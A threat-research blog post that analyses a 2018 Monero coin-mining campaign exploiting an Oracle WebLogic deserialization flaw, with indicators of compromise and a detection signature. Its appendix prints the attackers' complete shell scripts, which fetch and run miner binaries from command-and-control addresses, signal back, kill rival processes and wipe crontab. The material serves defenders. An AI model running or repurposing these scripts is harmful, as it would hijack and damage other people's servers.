SHARE
Threat Research / January 12, 2018

Coin Mining by Opportunistic and Automated Threats

With the recent surge in popularity and increasing value of cryptocurrency, it should be no surprise that financially motivated threat actors have begun leveraging their victims to contribute to “mining” efforts, where the computing resources of the victim are used to generate cryptocurrency for the threat actor. To succeed in making a large profit, the actors must continually compromise a large number of victims and utilize significant computing resources. This demand for mass compromise has forced these threat actors to adopt automated methods that rely on opportunistic exploitation to outpace defenders, increasing the number of victims as quickly as possible with minimal cost.

While on the surface, the business impact from coin mining seems minimal, having an unauthorized party in control of systems you own introduces a dangerous wild card. Is it really a criminal performing coin mining or is that a disguise? What will they do with the access if coin mining is no longer profitable? The Gigamon Applied Threat Research (ATR) team has witnessed incidents stemming from criminals who decided to sell their access to other parties, and the increasingly common malware-as-a-service scheme contributes to the risk from “simple” coin mining. Simply stated, criminal post-exploitation has become an efficient and wide-spread business that poses a threat to all enterprises, especially those with a significant and historical internet footprint that may contain undocumented or obsolete systems and pages. In this post, we will provide a walkthrough of an attack campaign that the Gigamon ATR team has witnessed in the wild over the past several weeks and break down some key lessons learned from the attack.

Attack Walkthrough

Exploitation

Attackers primarily rely on opportunistic exploitation of well known (and signatured) vulnerabilities in applications running on internet connected systems, and exhibit complete disregard for stealth or disguise. Throughout the recently observed campaign, attackers originating from multiple source addresses (191.101.180[.]84, 72.11.140[.]178) leveraged CVE-2017-10271, a java deserialization vulnerability in the Oracle WebLogic Server, to target outdated servers (Figure 1). Java deserialization vulnerabilities are not unique to Oracle, and plague several older versions of WebSphere, JBoss, Jenkins, OpenNMS, etc. In this class of vulnerability, server software attempts to deserialize untrusted content without validation allowing an attacker to abuse the application for code execution.

Figure 1: Connections from an external untrusted entity with suspicious referrer to an exposed vulnerable Oracle WebLogic endpoint.

Tool Staging

Following exploitation of the system, the threat actor downloads and executes a shell script from their command and control (C2) server using Wget. Throughout the campaign, we observed several variations of the same tool (Table 1), each progressively adding capabilities or cleanup mechanisms. This indicates the possibility that the tool is either a public script that is getting reused and built upon, or that this campaign is more far-reaching than the Gigamon ATR team has independently observed to this point.

Identifier Hosted URL SHA1 Hash
Version A http://72.11.140[.]178/setup-watch df62241026a96cda6057d894000de8ed70b3b666
Version B http://191.101.180[.]84:80/robots.txt 4c3f1cc052f7216447df8954a55e373bdf2ecefc
Table 1: Versions of scripts seen by the Gigamon ATR team in recent campaigns.

In Version B, the Gigamon ATR team has observed, the script performs two major actions: cleanup and staging of tools. During the cleanup routine, the script performs extensive attempts to prevent multiplicative effects, killing active processes of previously running code, other coin miners on the system, or system utilities that might be used to detect the action. During the staging phase, the script runs two similar routines to download two different files from different URIs, provide executable permissions, and attempt execution of these files. Both files are downloaded to the path ‘/tmp/xfsallocd’. The script sends a follow-on signal to the controller via an HTTP request from the download utility to a specific URI to indicate whether the file was already running or successfully started. Figure 2 shows the complete network staging process without the signal for successful execution. For a complete review of the source code, please reference Appendix B.

Figure 2: Complete staging process without execution signal.

Profit

The executable binaries that are downloaded during staging are publicly known and identified Monero Coin Miners (Table 2). Analysis of the binaries show they are using the standard stratum connection string “stratum+tcp://pool.minexmr.com:80” with a wallet ID of “4AQe5sAFWZKECiaeNTt59LG7kVtqRoSRJMjrmQ6GiMFAeUvoL3MFeTE6zwwHkFPrAyNw2JHDxUSWL82RiZThPpk4SEg7Vqe”. Analysis of the wallet associated with this activity shows that the threat actor/s have been paid out a total of 603.535663865 XMR, which, at the current exchange rate, equates to approximately $260,000 (note that, with cryptocurrency price fluctuations, this number is purely a point in time estimate).

Download URI Local File Name SHA Hash
$HOST/files/l/default /tmp/xfsallocd, /tmp/watch-smartd f79a2ba735a988fa6f65988e1f3d39684727bdc4
$HOST/files/l/others /tmp/xfsallocd, /tmp/watch-smartd 7c57c61664f2b2373f755f22db9c156a1ca80849
Table 2: Binaries that have been observed staging during the campaign.

It is also worth noting that as of Jan 4, 2017, AlienVault published a signature to the public Emerging Threats feed (Figure 3) to identify activity with the associated wallet ID for this threat actor.

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET CURRENT_EVENTS CoinMiner? Malicious Authline Seen After CVE-2017-10271
Exploit"; flow:established,to_server; content:"{|22|id|22 3A|"; depth:6; content:"|22|method|22 3a 20 22|mining.authorize|22 
2c|"; within:100; content:"|22|params|22|"; within:50; content:"|5b 22|4AQe5sAFWZKECiaeNTt59LG7kVtqRoSRJMjrmQ6GiMFAeUvoL3MFeT
E6zwwHkFPrAyNw2JHDxUSWL82RiZThPpk4SEg7Vqe|22 2c 20 22|"; distance:0; metadata: former_category CURRENT_EVENTS; 
reference:url,otx.alienvault.com/pulse/5a4e1c4993199b299f90a212; classtype:trojan-activity; sid:2025186; rev:1; 
metadata:attack_target Web_Server, deployment Datacenter, signature_severity Major, created_at 2018_01_04, 
malware_family CoinMiner?, performance_impact Low, updated_at 2018_01_04;)

Figure 3: Emerging Threats Signature ID 2025186.

Analysis

As part of our investigations, the Gigamon ATR team’s analysts were able to identify additional related activity across our customer space and in the public domain. The primary points of pivot were signatures developed to match the Linux scripts, infrastructure analysis, open source intelligence gathering, and the wallet ID tied to the threat actor observed in the aforementioned campaign. By pivoting on these indicators, the Gigamon ATR team discovered the following:

  • Fourteen additional Linux shell script variants that had variations of the downloader string, host IP address, and coin miner file paths
  • Three variants of Windows PowerShell scripts that mirror the functionality of the observed Linux scripts
  • Two additional servers performing exploitation activity
  • Thirteen Windows XMRig coin miner variants customized for this campaign

All indicators discovered during this activity are provided and identified in Appendix A.

Lessons Learned

It is easy to look at this relatively simple activity and make a judgement of the attackers tradecraft—almost too simple for an enterprise to be susceptible to this type of activity. However, criminals are able to compromise a large number of victims and profit from the activity. The above reillustrates that:

  • Visibility and knowledge of your internet footprint is vital
  • Multi-layered detection strategies provide a robust means to discover malicious activity
  • Forensics and root cause analysis are critical for long term continuity of business operations during incidents

Visibility and Knowledge of Your Internet Footprint Is Vital

If the successful exploitation of outdated and exposed assets provides the threat actor a form of revenue, it is likely they will continue to use these techniques. Knowledge of your asset inventory, application versioning, and attack surface will help you to better prevent, detect, and respond. In the case of many outdated or legacy *nix-based systems, it is unlikely that any sort of endpoint detection or response software will be supported, increasing the need for widespread network visibility and accountability over these endpoints.

Multi-Layered Detection Strategies Provide a Robust Means to Discover Malicious Activity

Simply alerting on the IOCs provided in this post will serve as an initial layer of detection, but organizations should strive for more reliable indicators of malicious activity. In the case of this specific incident, there are numerous key detection points. Examples of these include:

  • Atomic Indicators: Threat intelligence matching on the servers, threat intel matching on the downloaded binaries, coin mining network activity, etc.
  • Complex Indicators: Executables downloaded with a suspicious user-agent, interaction with internet exposed systems from “newly observed” low-reputation entities, executables download immediately following an exploit attempt, etc.

Forensics and Root Cause Analysis Are Critical for Long Term Continuity of Business Operations During Incidents

Even if successfully detected, a failure to contain or remediate the activity will likely lead to continued exploitation. In the case of interactive threat actors, an incomplete remediation will also provide a significant tip-off of your knowledge of their presence. Consider the scenario where you detect the activity, perform forensics to validate that no additional exploitation has occurred, and move to reimage the system for business continuity. Proper removal can be a time consuming and intricate process that may be best handled by bringing in an Incident Response team to ensure complete remediation.

Gigamon Insight is a network security analytics solution that offers a SaaS capability that enables customers to gain and utilize widespread network visibility for security operations. As part of its research, the Gigamon ATR team coordinates disclosure of security threats and vulnerabilities with relevant parties in order to maximize both the response and victim remediation efforts as well as working to truly improve the security of customers and other victims prior to publishing blog posts. To learn more about the Gigamon ATR team, please visit www.gigamon.com/research/applied-threat-research-team.html.

Attachment A: Indicators of Compromise

Indicator Type Description
72.11.140[.]178 IP Address Server for exploitation and tool staging observed by ICEBRG
72.11.140[.]179 IP AddressServer for exploitation and tool staging identified via secondary analysis
72.11.140[.]180 IP AddressServer for exploitation and tool staging identified via secondary analysis
191.101.180[.]84 IP AddressServer for exploitation and tool staging identified via secondary analysis
/files/l/default URIURI of “default” coin mining malware
/files/l/others URIURI of “others” coin mining malware
carbon Filename Name of downloaded file, typically in /tmp or working dir
infoed FilenameName of downloaded file, typically in /tmp or working dir
ksxworker FilenameName of downloaded file, typically in /tmp or working dir
rcp_bh FilenameName of downloaded file, typically in /tmp or working dir
watch_smartd FilenameName of downloaded file, typically in /tmp or working dir
xfsallocd FilenameName of downloaded file, typically in /tmp or working dir
xlog-daemon FilenameName of downloaded file, typically in /tmp or working dir
9c2d266e880848a3f08dcceee0d27a660c521ac5 SHA1 Hash Hash of script delivered via exploit identified via secondary analysis
ca9fad2fe12b5231ae42f507afbb00a742b2e3d2 SHA1 HashHash of script delivered via exploit identified via secondary analysis
abc8be4e557107e80c1c342b7505dd3d2e47ef7f SHA1 HashHash of script delivered via exploit identified via secondary analysis
e843c894d837a41f5f9f2bcf932d1c5e49afe08b SHA1 HashHash of script delivered via exploit identified via secondary analysis
07133903f1c38e653e39f9877dca9575699e807d SHA1 HashHash of script delivered via exploit identified via secondary analysis
68039309925c8804fa745173cc8805938f3e3184 SHA1 HashHash of script delivered via exploit identified via secondary analysis
25c804e082a4adc01bfcbc19704f541c7026fa9b SHA1 HashHash of script delivered via exploit identified via secondary analysis
0b4f904cebd469abff43f0457ab6a77466453173 SHA1 HashHash of script delivered via exploit identified via secondary analysis
c0b76bca13da6989f05c4aeac59029c3987d7f98 SHA1 HashHash of script delivered via exploit identified via secondary analysis
3909125fd2ddca0aff8130115ef8b870e508e795 SHA1 HashHash of script delivered via exploit identified via secondary analysis
348d1b3a54dc89250531258fe822e3a948dbc071 SHA1 HashHash of script delivered via exploit identified via secondary analysis
b4771410fe5bf3825df41735820aeaeff3c685bb SHA1 HashHash of script delivered via exploit identified via secondary analysis
13736cfc4df64a9890c4474f0003a54a8b72ffe2 SHA1 HashHash of script delivered via exploit identified via secondary analysis
5249dadfea25acaeb66a0f1798ac2f09a41f2449 SHA1 HashHash of script delivered via exploit identified via secondary analysis
df62241026a96cda6057d894000de8ed70b3b666 SHA1 HashHash of script delivered via exploit observed by ICEBRG
4c3f1cc052f7216447df8954a55e373bdf2ecefc SHA1 HashHash of script delivered via exploit observed by ICEBRG
f79a2ba735a988fa6f65988e1f3d39684727bdc4 SHA1 HashHash of downloaded coinminer tool “default” observed by ICEBRG
7c57c61664f2b2373f755f22db9c156a1ca80849 SHA1 HashHash of downloaded coinminer tool “other” observed by ICEBRG
73f9eff7c66df6e5d3c7ff113e9c8bbc7436d47c SHA1 HashHash of PowerShell variant A identified via secondary analysis
3b348578d15080856b869937240899a71bc4f0da SHA1 HashHash of PowerShell variant B identified via secondary analysis
8a8a606f7b2c5efca11c7a7d3d692d5c36a19a7b SHA1 HashHash of PowerShell variant C identified via secondary analysis
d0cee3f54e6768520d5b96337fcfe6e217567ed7 SHA1 HashXMRig CPU Miner (Windows) identified via secondary analysis
176d27189aa72330ef2676c8fbee939c6a0ddea2 SHA1 HashXMRig CPU Miner (Windows) identified via secondary analysis
auto-upgrade.exeFilenameWindows filename for XMRig. Stored in path ‘$env:TMP’
/files/w/defaultURIURI of hosted “default” XMRig binary for Windows
/files/w/othersURIURI of hosted “other” XMRig binary for Windows
2384c36517e300628a040393b05a546ede2808e0 SHA1 HashXMRig CPU Miner (Windows) identified via secondary analysis
176d27189aa72330ef2676c8fbee939c6a0ddea2 SHA1 HashXMRig CPU Miner (Windows) identified via secondary analysis
43a2535e11d8ba03f6347e324bee93125c7d6cf6 SHA1 HashXMRig CPU Miner (Windows) identified via secondary analysis
bc30a4d02155a65cc79697b6e1a5d224e59bbfc7 SHA1 HashXMRig CPU Miner (Windows) identified via secondary analysis
7495514ddc01d262c46b0886a7ce9d9eca334b33 SHA1 HashXMRig CPU Miner (Windows) identified via secondary analysis
d0cee3f54e6768520d5b96337fcfe6e217567ed7 SHA1 HashXMRig CPU Miner (Windows) identified via secondary analysis
7ca8f4b97693d5612106b270bffc86c0ecc21649 SHA1 HashXMRig CPU Miner (Windows) identified via secondary analysis
9534f9e94a2b6b7752685a7634d3f904b5fbb3ae SHA1 HashXMRig CPU Miner (Windows) identified via secondary analysis
05ee995cf49feee849a356fcd93c37260fa44fa2 SHA1 HashXMRig CPU Miner (Windows) identified via secondary analysis
df8aa574bf020e289707e4dc78d9ca053bfafe67 SHA1 HashXMRig CPU Miner (Windows) identified via secondary analysis
ab5ef923bc35cac25374716468c3b739cd688b9a SHA1 HashXMRig CPU Miner (Windows) identified via secondary analysis
de136240b00ed289c29dbde7fcf99313acad458f SHA1 HashXMRig CPU Miner (Windows) identified via secondary analysis
2e4a31a68fd27f9435c326988e614b46e196a32d SHA1 HashXMRig CPU Miner (Windows) identified via secondary analysis

Differential Analysis of Linux Shell Scripts

SHA1 Hash Downloader Host Local File
9c2d266e880848a3f08dcceee0d27a660c521ac5curl72.11.140[.]178/tmp/rcp_bh
ca9fad2fe12b5231ae42f507afbb00a742b2e3d2wget -q -O – 72.11.140[.]178/tmp/infoed
abc8be4e557107e80c1c342b7505dd3d2e47ef7fwget -q -O –191.101.180[.]84 `pwd`/xfsallocd

/tmp/xfsallocd

e843c894d837a41f5f9f2bcf932d1c5e49afe08bwget -q -O –191.101.180[.]84`pwd`/xfsallocd

/tmp/xfsallocd

07133903f1c38e653e39f9877dca9575699e807dwget -q -O –72.11.140[.]178/tmp/carbon
68039309925c8804fa745173cc8805938f3e3184curl72.11.140[.]178/tmp/infoed
25c804e082a4adc01bfcbc19704f541c7026fa9bwget -q -O –72.11.140[.]180`pwd`/xlog-daemon
0b4f904cebd469abff43f0457ab6a77466453173wget -q -O –72.11.140[.]178/tmp/rcp_bh
c0b76bca13da6989f05c4aeac59029c3987d7f98wget -q -O –191.101.180[.]84`pwd`/xfsallocd

/tmp/xfsallocd

3909125fd2ddca0aff8130115ef8b870e508e795curl191.101.180[.]84/tmp/xfsallocd
348d1b3a54dc89250531258fe822e3a948dbc071wget -q -O –72.11.140[.]178`pwd`/rcp_bh
b4771410fe5bf3825df41735820aeaeff3c685bbcurl72.11.140[.]178/tmp/infoed
13736cfc4df64a9890c4474f0003a54a8b72ffe2curl72.11.140[.]178`pwd`/rcp_bh
5249dadfea25acaeb66a0f1798ac2f09a41f2449wget -q -O –72.11.140[.]179/tmp/ksxworker
df62241026a96cda6057d894000de8ed70b3b666 wget -q -O –72.11.140[.]178/tmp/watch-smartd
4c3f1cc052f7216447df8954a55e373bdf2ecefcwget -q -O –191.101.180[.]84/tmp/xfsallocd

Attachment B: Script Source Code

Version A

HOST=72.11.140.178
CALLBACK=$HOST
# DOWNLOADER="curl "
DOWNLOADER="wget -q -O - "
DEFAULT_RFILE=$HOST/files/l/default
OTHERS_RFILE=$HOST/files/l/others
LFILE_NAME="watch-smartd"
# LFILE_PATH=`pwd`/$LFILE_NAME
LFILE_PATH=/tmp/$LFILE_NAME
DEFAULT ()
{
 $DOWNLOADER $DEFAULT_RFILE > $LFILE_PATH
 chmod +x $LFILE_PATH
 ps -ef|grep $LFILE_NAME|grep -v grep
 if [ $? -ne 0 ]; then
   $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l60"
 else
   $DOWNLOADER "${CALLBACK}/?info=l69"
 fi
}
OTHERS ()
{
 $DOWNLOADER $OTHERS_RFILE > $LFILE_PATH
 chmod +x $LFILE_PATH
 ps -ef|grep $LFILE_NAME|grep -v grep
 if [ $? -ne 0 ]; then
   $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l30"
 else
   $DOWNLOADER "${CALLBACK}/?info=l39"
 fi
}
DEFAULT || OTHERS

Version B

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
HOST=191.101.180.84
CALLBACK=$HOST
# DOWNLOADER="curl "
DOWNLOADER="wget -q -O - "
LFILE_NAME="xfsallocd"
# LFILE_PATH=`pwd`/$LFILE_NAME
LFILE_PATH=/tmp/$LFILE_NAME
DEFAULT_RFILE=$HOST/files/l/default
OTHERS_RFILE=$HOST/files/l/others
CLEAN ()
{
 RMLIST=(/tmp/*index_bak* /tmp/*httpd.conf* /tmp/*httpd.conf /tmp/a7b104c270 /tmp/Carbon)
 KILIST=(sb1 wipefs AnXqV.yam zhuabcn@yahoo.com monerohash.com /tmp/a7b104c270 stratum.f2pool.com:8888 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQt989KEfGRt6Ww2Xg8 46SDR76rJ2J6MtmP3ZZKi9cEA5RQCrYgag7La3CxEootQeAQULPE2CHJQ4MRZ5wZ1T73Kw6Kx4Lai2dFLAacjerbPzb5Ufg 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe xmrpool.eu mine.moneropool.com xmr.crypto-pool.fr:8080 xmr.crypto-pool.fr:3333 xmr.crypto-pool.fr:6666 xmr.crypto-pool.fr:7777 xmr.crypto-pool.fr:443)
 for item in ${RMLIST[@]}
 do
     rm -rf $item
 done
 for item in ${KILIST[@]}
 do
     ps auxf|grep -v grep|grep $item|awk '{print $2}'|xargs kill -9
 done
 days=$(($(date +%s) / 60 / 60 / 24))
 ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep ${days}|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "logind.conf"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "kworker"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "Silence"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "45hsTaSqTQM4K1Xeqkcy7eLzqdEuQ594fJVmQryCemQSCU878JGQdSDCxbhNyVjSkiaYat8yAfBuRTPSEUPZoARm9a5XEHZ"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "t.sh"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "wipefs"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "carbon"|awk '{print $2}'|xargs kill -9
 pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4
 pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB
 pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df
 pkill -f cpuloadtest
 pkill -f crypto-pool
 pkill -f xmr
 pkill -f prohash
 pkill -f monero
 pkill -f miner
 pkill -f nanopool
 pkill -f minergate
 pkill -f yam
 pkill -f Silence
 pkill -f yam2
 pkill -f minerd
 pkill -f Circle_MI.png
 pkill -f curl
 ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "44pgg5mYVH6Gnc7gKfWGPR2CxfQLhwdrCPJGzLonwrSt5CKSeEy6izyjEnRn114HTU7AWFTp1SMZ6eqQfvrdeGWzUdrADDu"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "11231"|awk '{print $2}'|xargs kill -9
}
DEFAULT ()
{
 $DOWNLOADER $DEFAULT_RFILE > $LFILE_PATH
 chmod +x $LFILE_PATH
 ps -ef|grep $LFILE_NAME|grep -v grep
 if [ $? -ne 0 ]; then
   $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l60"
 else
   $DOWNLOADER "${CALLBACK}/?info=l69"
 fi
}
OTHERS ()
{
 $DOWNLOADER $OTHERS_RFILE > $LFILE_PATH
 chmod +x $LFILE_PATH
 ps -ef|grep $LFILE_NAME|grep -v grep
 if [ $? -ne 0 ]; then
   $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l30"
 else
   $DOWNLOADER "${CALLBACK}/?info=l39"
 fi
}
CLEAN
DEFAULT || OTHERS
crontab -r

RELATED CONTENT

SOLUTION BRIEF
Increase the effectiveness of your cyber defenses
REPORT
Learn how 1,200 of your IT security peers plan to fight cyberattacks
DEMO
See a simulated breach based on real-life customer challenges
TECH BRIEF
Get transparent, high-quality, actively managed detections

Back to top